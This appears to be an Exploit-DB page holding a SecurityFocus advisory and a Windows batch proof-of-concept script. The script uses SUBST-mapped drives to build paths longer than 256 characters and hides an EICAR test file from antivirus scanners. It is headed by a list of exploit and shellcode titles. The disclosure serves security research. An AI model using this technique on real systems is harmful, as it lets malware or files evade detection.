880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
55 lines
No EOL
3.4 KiB
Batchfile
55 lines
No EOL
3.4 KiB
Batchfile
source: https://www.securityfocus.com/bid/3989/info
|
|
|
|
There exists a condition in Microsoft Windows operating systems using NTFS that may allow for files to be hidden.
|
|
|
|
Though the NTFS filesystem allows for a 32000 character path, Microsoft Windows operating systems (NT4, 2000 and XP) enforce a 256 character limit. Any attempt to create, traverse or otherwise operate on a path longer than 256 chatacters will fail.
|
|
|
|
By using drives mapped to directories created with 'SUBST', it is possible to create directory paths longer than 256 characters. This can be accomplished by creating directories on the 'SUBST' drive. The directories on the drive will be subdirectories in the tree to which the drive is mapped. Creating these directories may result in the total absolute path exceeding the 256 character limit.
|
|
|
|
If the absolute path of a directory created on a 'SUBST' mapped drive exceeds 256 characters, any files within will be inaccessible through traversing the full path. The files may still be accessed through the paths on the mapped drive. If the drive is deleted, the files may be completely inaccessible unless a drive is re-mapped to the same position in the directory tree.
|
|
|
|
This vulnerability poses a serious risk to programs which scan the filesystem, such as antivirus software. When attempting to traverse the long path, Norton Antivirus and Kaspersky Antivirus fail to scan files in the long directory trees due to the Windows path restrictions. Furthermore, if a virus executes, they do not scan the disk image because it is inaccessible. Exploitation of this vulnerability may allow for viruses to remain undetected on filesystems. Attackers may also be able to hide files using this vulnerability, as Explorer and any other utility cannot traverse the paths where they are stored.
|
|
|
|
@echo off
|
|
cls
|
|
echo Start test-script NTFS-limit
|
|
@echo Create a filepath to the limit of NTFS
|
|
md
|
|
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
|
|
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
|
|
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
|
|
123456789
|
|
cd
|
|
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
|
|
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
|
|
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
|
|
123456789
|
|
@echo Create the Eicar test-string for PoC. This should be detected normally if you
|
|
have an active virusscanner.
|
|
echo
|
|
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
|
>EICAR.TXT
|
|
echo. >>EICAR.TXT
|
|
@echo Activate the Eicar test-string
|
|
copy EICAR.TXT EICAR1.COM >NUL
|
|
@echo Create a subst-drive Q: for this path
|
|
subst Q:
|
|
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
|
|
\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
|
|
67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
|
|
123456789
|
|
@echo Create e even deeper filepath (thus exceeding the limit of NTFS's explorer)
|
|
md Q:\1234567890\1234567890\1234567890
|
|
@echo Change current folder into "the deep"
|
|
Q:
|
|
cd Q:\1234567890\1234567890\1234567890
|
|
@echo Create the Eicar test-string
|
|
echo
|
|
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
|
>EICAR.TXT
|
|
echo. >>EICAR.TXT
|
|
@echo Activate the Eicar test-string
|
|
copy EICAR.TXT EICAR2.COM >NUL
|
|
EICAR2.COM
|
|
echo .
|
|
echo End of test-script |